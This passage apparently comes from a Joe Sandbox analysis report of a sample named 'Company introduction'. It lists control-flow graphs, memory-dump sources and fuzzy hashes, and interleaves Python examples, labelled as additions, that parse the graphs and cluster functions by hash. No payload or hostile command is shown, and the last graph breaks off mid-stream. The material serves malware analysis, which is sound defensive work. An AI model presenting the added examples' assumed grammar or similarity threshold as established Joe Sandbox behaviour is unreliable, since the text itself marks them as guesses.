                                                                                                                                                    control_flow_graph 2640 17d5362-17d5364 2641 17d53c4-17d5484 call 17d41a0 call 17d3cc0 2640->2641 2642 17d5366-17d53a0 2640->2642 2654 17d548b-17d54a9 2641->2654 2655 17d5486 2641->2655 2643 17d53a7-17d53c2 2642->2643 2644 17d53a2 2642->2644 2643->2641 2644->2643 2685 17d54ac call 17d5649 2654->2685 2686 17d54ac call 17d5658 2654->2686 2655->2654 2656 17d54b2-17d54bd 2657 17d54bf 2656->2657 2658 17d54c4-17d54c8 2656->2658 2657->2658 2659 17d54cd-17d54d4 2658->2659 2660 17d54ca-17d54cb 2658->2660 2662 17d54db-17d54e9 2659->2662 2663 17d54d6 2659->2663 2661 17d54ec-17d5530 2660->2661 2667 17d5596-17d55ad 2661->2667 2662->2661 2663->2662 2669 17d55af-17d55d4 2667->2669 2670 17d5532-17d5548 2667->2670 2677 17d55ec 2669->2677 2678 17d55d6-17d55eb 2669->2678 2674 17d554a-17d5556 2670->2674 2675 17d5572 2670->2675 2679 17d5558-17d555e 2674->2679 2680 17d5560-17d5566 2674->2680 2676 17d5578-17d5595 2675->2676 2676->2667 2678->2677 2681 17d5570 2679->2681 2680->2681 2681->2676 2685->2656 2686->2656
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 021143614e930704b9e2716cfbb44b31b2b4b806189e17d4a19c00a210269572
                                                                                                                                                    • Instruction ID: 1ae8b5170247dc2a141cfbb3abca98d4efa29bc892e7b19bdc9778b0d51a972a
                                                                                                                                                    • Opcode Fuzzy Hash: 021143614e930704b9e2716cfbb44b31b2b4b806189e17d4a19c00a210269572
                                                                                                                                                    • Instruction Fuzzy Hash: 0591C574E00258CFDB19CFA9D984A9DFBF2BF89300F1480A9E419AB365DB349985CF51

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2687 17dc468-17dc471 2688 17dc475-17dc498 2687->2688 2689 17dc473 2687->2689 2690 17dc49f-17dc57c call 17d41a0 call 17d3cc0 2688->2690 2691 17dc49a 2688->2691 2689->2688 2701 17dc57e 2690->2701 2702 17dc583-17dc5a4 call 17d5658 2690->2702 2691->2690 2701->2702 2704 17dc5a9-17dc5b4 2702->2704 2705 17dc5bb-17dc5bf 2704->2705 2706 17dc5b6 2704->2706 2707 17dc5c4-17dc5cb 2705->2707 2708 17dc5c1-17dc5c2 2705->2708 2706->2705 2710 17dc5cd 2707->2710 2711 17dc5d2-17dc5e0 2707->2711 2709 17dc5e3-17dc627 2708->2709 2715 17dc68d-17dc6a4 2709->2715 2710->2711 2711->2709 2717 17dc629-17dc63f 2715->2717 2718 17dc6a6-17dc6cb 2715->2718 2722 17dc669 2717->2722 2723 17dc641-17dc64d 2717->2723 2725 17dc6cd-17dc6e2 2718->2725 2726 17dc6e3 2718->2726 2724 17dc66f-17dc68c 2722->2724 2727 17dc64f-17dc655 2723->2727 2728 17dc657-17dc65d 2723->2728 2724->2715 2725->2726 2729 17dc667 2727->2729 2728->2729 2729->2724
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 3eba40fecbad92f7be9de301b23483e2da3e555c7a6f45b1b2c28cb80b534ff2
                                                                                                                                                    • Instruction ID: 4d1381e469fba45a0d6e9a075c7c8186984bf23733fc0e7bc57475ff0bab2d60
                                                                                                                                                    • Opcode Fuzzy Hash: 3eba40fecbad92f7be9de301b23483e2da3e555c7a6f45b1b2c28cb80b534ff2
                                                                                                                                                    • Instruction Fuzzy Hash: 3481C474E00218CFDB19DFAAD984A9DFBF2BF89300F149069E419AB365DB309985CF51

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2733 17dd278-17dd2a8 2734 17dd2af-17dd38c call 17d41a0 call 17d3cc0 2733->2734 2735 17dd2aa 2733->2735 2745 17dd38e 2734->2745 2746 17dd393-17dd3b4 call 17d5658 2734->2746 2735->2734 2745->2746 2748 17dd3b9-17dd3c4 2746->2748 2749 17dd3cb-17dd3cf 2748->2749 2750 17dd3c6 2748->2750 2751 17dd3d4-17dd3db 2749->2751 2752 17dd3d1-17dd3d2 2749->2752 2750->2749 2754 17dd3dd 2751->2754 2755 17dd3e2-17dd3f0 2751->2755 2753 17dd3f3-17dd437 2752->2753 2759 17dd49d-17dd4b4 2753->2759 2754->2755 2755->2753 2761 17dd439-17dd44f 2759->2761 2762 17dd4b6-17dd4db 2759->2762 2766 17dd479 2761->2766 2767 17dd451-17dd45d 2761->2767 2768 17dd4dd-17dd4f2 2762->2768 2769 17dd4f3 2762->2769 2772 17dd47f-17dd49c 2766->2772 2770 17dd45f-17dd465 2767->2770 2771 17dd467-17dd46d 2767->2771 2768->2769 2773 17dd477 2770->2773 2771->2773 2772->2759 2773->2772
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 8061feecf956320baed7264183743a359afb47274b7d26a92e2a7eabc6b77977
                                                                                                                                                    • Instruction ID: 9d7a437ae5ed7d9d8149126b496c2d660fac3c61e57b66d32e57ad4f87a19749
                                                                                                                                                    • Opcode Fuzzy Hash: 8061feecf956320baed7264183743a359afb47274b7d26a92e2a7eabc6b77977
                                                                                                                                                    • Instruction Fuzzy Hash: 1281B674E00258CFDB18DFAAD984A9DFBF2BF89300F148069E859AB365DB345985CF50

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2777 17dca08-17dca38 2779 17dca3f-17dcb1c call 17d41a0 call 17d3cc0 2777->2779 2780 17dca3a 2777->2780 2790 17dcb1e 2779->2790 2791 17dcb23-17dcb44 call 17d5658 2779->2791 2780->2779 2790->2791 2793 17dcb49-17dcb54 2791->2793 2794 17dcb5b-17dcb5f 2793->2794 2795 17dcb56 2793->2795 2796 17dcb64-17dcb6b 2794->2796 2797 17dcb61-17dcb62 2794->2797 2795->2794 2799 17dcb6d 2796->2799 2800 17dcb72-17dcb80 2796->2800 2798 17dcb83-17dcbc7 2797->2798 2804 17dcc2d-17dcc44 2798->2804 2799->2800 2800->2798 2806 17dcbc9-17dcbdf 2804->2806 2807 17dcc46-17dcc6b 2804->2807 2811 17dcc09 2806->2811 2812 17dcbe1-17dcbed 2806->2812 2813 17dcc6d-17dcc82 2807->2813 2814 17dcc83 2807->2814 2817 17dcc0f-17dcc2c 2811->2817 2815 17dcbef-17dcbf5 2812->2815 2816 17dcbf7-17dcbfd 2812->2816 2813->2814 2818 17dcc07 2815->2818 2816->2818 2817->2804 2818->2817
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: c5f4a1e8e4f38c274ec12857d03db5c37621d1f3fc26fd7e9176bb556c54e853
                                                                                                                                                    • Instruction ID: 8c694ab8da3166d1b6f2f64d8956f291c631732bced582c60975f00aae3243d5
                                                                                                                                                    • Opcode Fuzzy Hash: c5f4a1e8e4f38c274ec12857d03db5c37621d1f3fc26fd7e9176bb556c54e853
                                                                                                                                                    • Instruction Fuzzy Hash: B681A274E00218CFDB19DFAAD984A9DFBF2BF89300F148069E419AB365DB309985CF51
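                                                                                                                                                    The `control_flow_graph` line above is the only form in which this function's graph survives on the page: a flat token stream in which `<id> <start>[-<end>]` defines a basic block (decimal id, hex addresses), `call <target>` attaches a call to the block just defined (`* <n>` marks a repeated call, as in the 17d76f1 graph further down), and `<src>-><dst>` is an edge. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin; it parses that stream, recovers entry and exit blocks, call targets and loop back edges, and is checked against the 17dca08 graph copied from above. The token grammar is inferred from the listings here and is an assumption, as is the `* <n>` handling.

```python
"""Parse a Joe Sandbox 'control_flow_graph' token stream and summarise it.

Added example, not part of the Joe Sandbox report. The grammar is an
assumption inferred from the listings on this page:
    <id> <start>[-<end>] [call <target> [* <n>]]...   defines a basic block
    <src>-><dst>                                      is a control-flow edge
Block ids are decimal, addresses are hex. Runs offline.
"""
from collections import defaultdict
from dataclasses import dataclass, field

# Copied from the graph for 17dca08 on this page (not constructed).
SAMPLE = (
    "control_flow_graph 2777 17dca08-17dca38 2779 17dca3f-17dcb1c call 17d41a0 "
    "call 17d3cc0 2777->2779 2780 17dca3a 2777->2780 2790 17dcb1e 2779->2790 "
    "2791 17dcb23-17dcb44 call 17d5658 2779->2791 2780->2779 2790->2791 "
    "2793 17dcb49-17dcb54 2791->2793 2794 17dcb5b-17dcb5f 2793->2794 "
    "2795 17dcb56 2793->2795 2796 17dcb64-17dcb6b 2794->2796 "
    "2797 17dcb61-17dcb62 2794->2797 2795->2794 2799 17dcb6d 2796->2799 "
    "2800 17dcb72-17dcb80 2796->2800 2798 17dcb83-17dcbc7 2797->2798 "
    "2804 17dcc2d-17dcc44 2798->2804 2799->2800 2800->2798 "
    "2806 17dcbc9-17dcbdf 2804->2806 2807 17dcc46-17dcc6b 2804->2807 "
    "2811 17dcc09 2806->2811 2812 17dcbe1-17dcbed 2806->2812 "
    "2813 17dcc6d-17dcc82 2807->2813 2814 17dcc83 2807->2814 "
    "2817 17dcc0f-17dcc2c 2811->2817 2815 17dcbef-17dcbf5 2812->2815 "
    "2816 17dcbf7-17dcbfd 2812->2816 2813->2814 2818 17dcc07 2815->2818 "
    "2816->2818 2817->2804 2818->2817"
)


@dataclass
class Block:
    node: int
    start: int
    end: int
    calls: list = field(default_factory=list)


@dataclass
class CFG:
    blocks: dict   # node id -> Block
    edges: list    # (src, dst) pairs in listing order


def parse_cfg(text):
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(toks):
        tok = toks[i]
        if "->" in tok:                       # edge: "2777->2779"
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
            i += 1
        elif tok == "call":                   # call out of the block just defined
            if current is None:
                raise ValueError("call before any block definition")
            target, count, i = int(toks[i + 1], 16), 1, i + 2
            if i + 1 < len(toks) and toks[i] == "*":   # "call X * 2" (assumed meaning)
                count, i = int(toks[i + 1]), i + 2
            current.calls.extend([target] * count)
        else:                                 # block: "<id> <start>[-<end>]"
            lo, _, hi = toks[i + 1].partition("-")
            start = int(lo, 16)
            current = Block(int(tok), start, int(hi, 16) if hi else start)
            blocks[current.node] = current
            i += 2
    return CFG(blocks, edges)


def entry_nodes(cfg):
    targets = {dst for _, dst in cfg.edges}
    return sorted(n for n in cfg.blocks if n not in targets)


def exit_nodes(cfg):
    sources = {src for src, _ in cfg.edges}
    return sorted(n for n in cfg.blocks if n not in sources)


def back_edges(cfg):
    """Edges that close a loop, found by DFS colouring (grey = on the DFS stack)."""
    succ = defaultdict(list)
    for src, dst in cfg.edges:
        succ[src].append(dst)
    WHITE, GREY, BLACK = 0, 1, 2
    colour = defaultdict(int)
    found = []

    def visit(n):
        colour[n] = GREY
        for m in succ[n]:
            if colour[m] == GREY:
                found.append((n, m))
            elif colour[m] == WHITE:
                visit(m)
        colour[n] = BLACK

    for n in entry_nodes(cfg) + sorted(cfg.blocks):
        if colour[n] == WHITE:
            visit(n)
    return found


def summarize(cfg):
    return {
        "blocks": len(cfg.blocks),
        "edges": len(cfg.edges),
        "lo": min(b.start for b in cfg.blocks.values()),
        "hi": max(b.end for b in cfg.blocks.values()),
        "entry": entry_nodes(cfg),
        "exit": exit_nodes(cfg),
        "loops": back_edges(cfg),
        "calls": sorted({t for b in cfg.blocks.values() for t in b.calls}),
    }


if __name__ == "__main__":
    s = summarize(parse_cfg(SAMPLE))
    print(f"{s['blocks']} blocks, {s['edges']} edges, {s['lo']:#x}-{s['hi']:#x}")
    print("entry", s["entry"], "exit", s["exit"], "calls", [hex(c) for c in s["calls"]])
    print("back edges", s["loops"])
```

On the 17dca08 graph the single back edge is 2817 -> 2804: the loop header at 17dcc2d sits after its body (17dcbc9..17dcc2c) and is entered by a forward jump from 2798, the usual layout of a loop whose condition is placed at the bottom. Running the same parser over the 17dccd8 and 17dcfaa graphs is the quickest way to confirm they are copies of the same routine, which their shared String ID and near-identical Instruction Fuzzy Hash already suggest; the parser also tolerates several node ids sharing one address, as the 17d5f38 graph below does at 17d5fba and 17d6011.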

                                                                                                                                                    Control-flow Graph
                                                                                                                                                    control_flow_graph 2822 17dccd8-17dcd08 2823 17dcd0f-17dcdec call 17d41a0 call 17d3cc0 2822->2823 2824 17dcd0a 2822->2824 2834 17dcdee 2823->2834 2835 17dcdf3-17dce14 call 17d5658 2823->2835 2824->2823 2834->2835 2837 17dce19-17dce24 2835->2837 2838 17dce2b-17dce2f 2837->2838 2839 17dce26 2837->2839 2840 17dce34-17dce3b 2838->2840 2841 17dce31-17dce32 2838->2841 2839->2838 2843 17dce3d 2840->2843 2844 17dce42-17dce50 2840->2844 2842 17dce53-17dce97 2841->2842 2848 17dcefd-17dcf14 2842->2848 2843->2844 2844->2842 2850 17dce99-17dceaf 2848->2850 2851 17dcf16-17dcf3b 2848->2851 2855 17dced9 2850->2855 2856 17dceb1-17dcebd 2850->2856 2857 17dcf3d-17dcf52 2851->2857 2858 17dcf53 2851->2858 2861 17dcedf-17dcefc 2855->2861 2859 17dcebf-17dcec5 2856->2859 2860 17dcec7-17dcecd 2856->2860 2857->2858 2862 17dced7 2859->2862 2860->2862 2861->2848 2862->2861
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 00977e2f1461b20ce3addac914b186b29e1cf83b1c32061469ba95f8ab475c6b
                                                                                                                                                    • Instruction ID: b0952788619b8bc846596f7c49f7447664d837e9e56b0370d77c25cf1fa55824
                                                                                                                                                    • Opcode Fuzzy Hash: 00977e2f1461b20ce3addac914b186b29e1cf83b1c32061469ba95f8ab475c6b
                                                                                                                                                    • Instruction Fuzzy Hash: D681A374E002588FDB19DFAAD984A9DFBF2BF89300F14C0A9E419AB365DB305985CF51

                                                                                                                                                    Control-flow Graph
                                                                                                                                                    control_flow_graph 2866 17dcfaa-17dcfd8 2867 17dcfdf-17dd0bc call 17d41a0 call 17d3cc0 2866->2867 2868 17dcfda 2866->2868 2878 17dd0be 2867->2878 2879 17dd0c3-17dd0e4 call 17d5658 2867->2879 2868->2867 2878->2879 2881 17dd0e9-17dd0f4 2879->2881 2882 17dd0fb-17dd0ff 2881->2882 2883 17dd0f6 2881->2883 2884 17dd104-17dd10b 2882->2884 2885 17dd101-17dd102 2882->2885 2883->2882 2887 17dd10d 2884->2887 2888 17dd112-17dd120 2884->2888 2886 17dd123-17dd167 2885->2886 2892 17dd1cd-17dd1e4 2886->2892 2887->2888 2888->2886 2894 17dd169-17dd17f 2892->2894 2895 17dd1e6-17dd20b 2892->2895 2899 17dd1a9 2894->2899 2900 17dd181-17dd18d 2894->2900 2902 17dd20d-17dd222 2895->2902 2903 17dd223 2895->2903 2901 17dd1af-17dd1cc 2899->2901 2904 17dd18f-17dd195 2900->2904 2905 17dd197-17dd19d 2900->2905 2901->2892 2902->2903 2906 17dd1a7 2904->2906 2905->2906 2906->2901
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: daa01eee2a3d3e077a90a90b0f9dc9986560b0f5baf5cff2a0fb94a9ee98b143
                                                                                                                                                    • Instruction ID: ec2ea406ada9abba18f1b50bf1ac5b1bdac1c1b1b3fc51fd28943036db23e6cd
                                                                                                                                                    • Opcode Fuzzy Hash: daa01eee2a3d3e077a90a90b0f9dc9986560b0f5baf5cff2a0fb94a9ee98b143
                                                                                                                                                    • Instruction Fuzzy Hash: BD81B374E00218CFDB18DFAAD984A9DFBF2BF89310F148069E419AB365DB359985CF10
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: a1075035ddbf2eb157a97e3a51d978ee2890761ebbc908fbe257280b3e121261
                                                                                                                                                    • Instruction ID: 460b7ea2e067a557e4cffb0b6b6d1c18ef9e20c2fd7e97d45def26c50407e5f7
                                                                                                                                                    • Opcode Fuzzy Hash: a1075035ddbf2eb157a97e3a51d978ee2890761ebbc908fbe257280b3e121261
                                                                                                                                                    • Instruction Fuzzy Hash: 8981A474E00218CFDB19DFAAD984A9DFBF2BF89310F148069E419AB365DB345985CF50
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2955296568.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_5a80000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3da511391edbf7254aa3544e6e247139de815cd37af9403d803ca0e80e3b2ba0
                                                                                                                                                    • Instruction ID: 60f24393bdfc42b6914012da11c81756073671f6f5baffeb6ff640fd81519af7
                                                                                                                                                    • Opcode Fuzzy Hash: 3da511391edbf7254aa3544e6e247139de815cd37af9403d803ca0e80e3b2ba0
                                                                                                                                                    • Instruction Fuzzy Hash: 2191CF71E002198FCB19EFBAC954ABEBAF3BF88310F148569D416A7394DB349D05CB91
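                                                                                                                                                    Four of the 017D0000 records above share the String ID `PH^q$PH^q` and Instruction Fuzzy Hashes that differ in only a handful of hex digits, while the InitializeThunk record from the 05A80000 dump does not resemble them. The report does not say how its "Similarity" comparison works, so the following added example (not Joe Sandbox code) stands in Hamming distance over the hex digits with an assumed clone threshold of 15: it parses the bullet-style records copied from this page (fields not needed here omitted) and clusters near-duplicates, so that one representative per cluster is enough for manual review.

```python
"""Cluster the per-function records on this page by Instruction Fuzzy Hash.

Added example, not part of the Joe Sandbox report. The similarity measure
(Hamming distance over hex digits, threshold MAX_DIST) is an assumption; the
record text below is copied from this page with unused fields omitted.
"""
from itertools import combinations

MAX_DIST = 15   # assumed: up to this many differing hex digits still counts as a clone

RECORDS_TEXT = """\
Memory Dump Source
• Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
• String ID: PH^q$PH^q
• Instruction ID: 8c694ab8da3166d1b6f2f64d8956f291c631732bced582c60975f00aae3243d5
• Instruction Fuzzy Hash: B681A274E00218CFDB19DFAAD984A9DFBF2BF89300F148069E419AB365DB309985CF51
Memory Dump Source
• Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
• String ID: PH^q$PH^q
• Instruction ID: b0952788619b8bc846596f7c49f7447664d837e9e56b0370d77c25cf1fa55824
• Instruction Fuzzy Hash: D681A374E002588FDB19DFAAD984A9DFBF2BF89300F14C0A9E419AB365DB305985CF51
Memory Dump Source
• Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
• String ID: PH^q$PH^q
• Instruction ID: ec2ea406ada9abba18f1b50bf1ac5b1bdac1c1b1b3fc51fd28943036db23e6cd
• Instruction Fuzzy Hash: BD81B374E00218CFDB18DFAAD984A9DFBF2BF89310F148069E419AB365DB359985CF10
Memory Dump Source
• Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
• String ID: PH^q$PH^q
• Instruction ID: 460b7ea2e067a557e4cffb0b6b6d1c18ef9e20c2fd7e97d45def26c50407e5f7
• Instruction Fuzzy Hash: 8981A474E00218CFDB19DFAAD984A9DFBF2BF89310F148069E419AB365DB345985CF50
Memory Dump Source
• Source File: 00000006.00000002.2955296568.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
• API ID: InitializeThunk
• String ID:
• Instruction ID: 60f24393bdfc42b6914012da11c81756073671f6f5baffeb6ff640fd81519af7
• Instruction Fuzzy Hash: 2191CF71E002198FCB19EFBAC954ABEBAF3BF88310F148569D416A7394DB349D05CB91
"""


def parse_records(text):
    """Split the page's bullet records at each 'Memory Dump Source' line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            records.append(cur)
        elif cur is not None and line.startswith("• ") and ":" in line:
            key, _, value = line[2:].partition(":")
            cur[key.strip()] = value.strip()
    return records


def hamming(a, b):
    if len(a) != len(b):
        raise ValueError("fuzzy hashes of different length are not comparable")
    return sum(x != y for x, y in zip(a, b))


def cluster(records, max_dist=MAX_DIST):
    """Single-linkage clusters (union-find) of record indexes within max_dist."""
    parent = list(range(len(records)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i, j in combinations(range(len(records)), 2):
        hi = records[i]["Instruction Fuzzy Hash"]
        hj = records[j]["Instruction Fuzzy Hash"]
        if len(hi) == len(hj) and hamming(hi, hj) <= max_dist:
            parent[find(i)] = find(j)
    groups = {}
    for i in range(len(records)):
        groups.setdefault(find(i), []).append(i)
    return sorted(groups.values())


def triage(records):
    """One row per cluster: size, representative Instruction ID, dump offset, String ID."""
    rows = []
    for members in cluster(records):
        rep = records[members[0]]
        rows.append((len(members), rep["Instruction ID"][:12],
                     rep["Source File"].split(",")[1].strip(),
                     rep.get("String ID", "")))
    return rows


if __name__ == "__main__":
    for size, iid, dump, sid in triage(parse_records(RECORDS_TEXT)):
        print(f"{size} function(s)  rep={iid}  {dump}  strings={sid!r}")
```

The threshold is deliberately loose for this illustration; on a full report, check the clusters against the graphs (block and edge counts, call targets) before treating members as interchangeable, since a fuzzy hash summarises instruction patterns, not control flow.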
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0c264ab2a85384b832688a7b1e6dcabb31ffae46d962f8702ee25a8960198023
                                                                                                                                                    • Instruction ID: 1276f4cd5408d808af22cd49d844899ba22c84bbbc4a4b2a4c2ee60d01948351
                                                                                                                                                    • Opcode Fuzzy Hash: 0c264ab2a85384b832688a7b1e6dcabb31ffae46d962f8702ee25a8960198023
                                                                                                                                                    • Instruction Fuzzy Hash: E151D574E00208DFDB19DFAAD584A9DFBB2FF89300F248069E815AB364DB315946CF11
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a57b692daf8e8f9989abc0977ac65efd9ae6ae131f1514c70cbb54db7be6b076
                                                                                                                                                    • Instruction ID: 9cd3a30a440af262edd223d4d921203624ac63e4cad0aee1957d30a47769fbe9
                                                                                                                                                    • Opcode Fuzzy Hash: a57b692daf8e8f9989abc0977ac65efd9ae6ae131f1514c70cbb54db7be6b076
                                                                                                                                                    • Instruction Fuzzy Hash: 26519274E00208DFDB19DFAAD584A9DFBB2BF88300F248529E819AB364DB359945CF51

                                                                                                                                                    Control-flow Graph
                                                                                                                                                    control_flow_graph 0 17d76f1-17d7725 1 17d772b-17d774e 0->1 2 17d7b54-17d7b58 0->2 11 17d77fc-17d7800 1->11 12 17d7754-17d7761 1->12 3 17d7b5a-17d7b6e 2->3 4 17d7b71-17d7b7f 2->4 9 17d7b81-17d7b96 4->9 10 17d7bf0-17d7c05 4->10 20 17d7b9d-17d7baa 9->20 21 17d7b98-17d7b9b 9->21 22 17d7c0c-17d7c19 10->22 23 17d7c07-17d7c0a 10->23 13 17d7848-17d7851 11->13 14 17d7802-17d7810 11->14 26 17d7770 12->26 27 17d7763-17d776e 12->27 17 17d7c67 13->17 18 17d7857-17d7861 13->18 14->13 32 17d7812-17d782d 14->32 33 17d7c6c-17d7c9c 17->33 18->2 24 17d7867-17d7870 18->24 28 17d7bac-17d7bed 20->28 21->28 29 17d7c1b-17d7c56 22->29 23->29 30 17d787f-17d788b 24->30 31 17d7872-17d7877 24->31 34 17d7772-17d7774 26->34 27->34 76 17d7c5d-17d7c64 29->76 30->33 39 17d7891-17d7897 30->39 31->30 60 17d782f-17d7839 32->60 61 17d783b 32->61 53 17d7c9e-17d7cb4 33->53 54 17d7cb5-17d7cbc 33->54 34->11 41 17d777a-17d77dc 34->41 42 17d789d-17d78ad 39->42 43 17d7b3e-17d7b42 39->43 88 17d77de 41->88 89 17d77e2-17d77f9 41->89 58 17d78af-17d78bf 42->58 59 17d78c1-17d78c3 42->59 43->17 47 17d7b48-17d7b4e 43->47 47->2 47->24 62 17d78c6-17d78cc 58->62 59->62 63 17d783d-17d783f 60->63 61->63 62->43 70 17d78d2-17d78e1 62->70 63->13 71 17d7841 63->71 72 17d798f-17d79ba call 17d7538 * 2 70->72 73 17d78e7 70->73 71->13 90 17d7aa4-17d7abe 72->90 91 17d79c0-17d79c4 72->91 74 17d78ea-17d78fb 73->74 74->33 78 17d7901-17d7913 74->78 78->33 81 17d7919-17d7931 78->81 144 17d7933 call 17d80c9 81->144 145 17d7933 call 17d80d8 81->145 84 17d7939-17d7949 84->43 87 17d794f-17d7952 84->87 92 17d795c-17d795f 87->92 93 17d7954-17d795a 87->93 88->89 89->11 90->2 113 17d7ac4-17d7ac8 90->113 91->43 94 17d79ca-17d79ce 91->94 92->17 95 17d7965-17d7968 92->95 93->92 93->95 98 17d79f6-17d79fc 94->98 99 17d79d0-17d79dd 94->99 100 17d796a-17d796e 95->100 101 17d7970-17d7973 95->101 103 17d79fe-17d7a02 98->103 104 17d7a37-17d7a3d 98->104 116 17d79ec 99->116 117 17d79df-17d79ea 99->117 100->101 102 17d7979-17d797d 100->102 101->17 101->102 102->17 110 17d7983-17d7989 102->110 103->104 105 17d7a04-17d7a0d 103->105 107 17d7a3f-17d7a43 104->107 108 17d7a49-17d7a4f 104->108 111 17d7a1c-17d7a32 105->111 112 17d7a0f-17d7a14 105->112 107->76 107->108 114 17d7a5b-17d7a5d 108->114 